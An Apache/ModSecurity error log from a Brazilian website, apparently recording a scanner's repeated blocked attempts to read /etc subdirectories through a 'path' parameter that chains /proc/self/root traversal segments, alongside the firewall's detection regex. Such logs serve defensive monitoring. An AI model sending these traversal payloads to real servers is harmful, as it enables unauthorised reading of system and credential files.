[Mon Mar 16 13:05:59.737911 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:47164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqZ_9ocpUE4ed4uDzw3wAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:02.158091 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:34700] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqarABkC4fWIHEf8HtcwAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:03.477297 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:34704] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqa9SswJuvopo3lOhhRgAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:04.782000 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:34718] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqbLysWC90G-1nBrBHNAAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:07.057084 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.243.203:34730] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqbxXjF1vJNtV6CWr4TAAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:08.418660 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:34732] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqcHbQATo66fKoS7xSKgAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:09.811463 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:34734] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqcXbQATo66fKoS7xSLAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:12.366155 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.243.203:43276] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqdI6lpbStxTqkSktuTAAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:14.678013 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:43292] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqdrysWC90G-1nBrBHOAAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:15.585477 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.241.46:44816] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqd5qj1wV0Si-OkefwPQAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:16.140278 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.243.203:43302] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqeP9ocpUE4ed4uDzw7QAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:17.447968 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.243.203:43306] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqebysWC90G-1nBrBHOQAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:19.640205 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.243.203:43308] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqetSswJuvopo3lOhhSQAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:20.934884 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.243.203:48252] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqfLysWC90G-1nBrBHOgAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:24.288270 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.243.203:48264] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqgJqj1wV0Si-OkefwQQAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:25.581029 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.243.203:48274] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqgQlT9VtDQc7bgUy1ZgAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:26.903005 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.243.203:48282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqgnjZBu2q05ozVU9aTAAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:32.403875 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:48284] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqiI6lpbStxTqkSktuVwAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:33.662600 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.243.203:49698] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqiRXjF1vJNtV6CWr4UgAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:34.959245 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:49700] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqio6lpbStxTqkSktuWQAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:06:37.259091 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.243.203:49710] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqjdSswJuvopo3lOhhTgAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
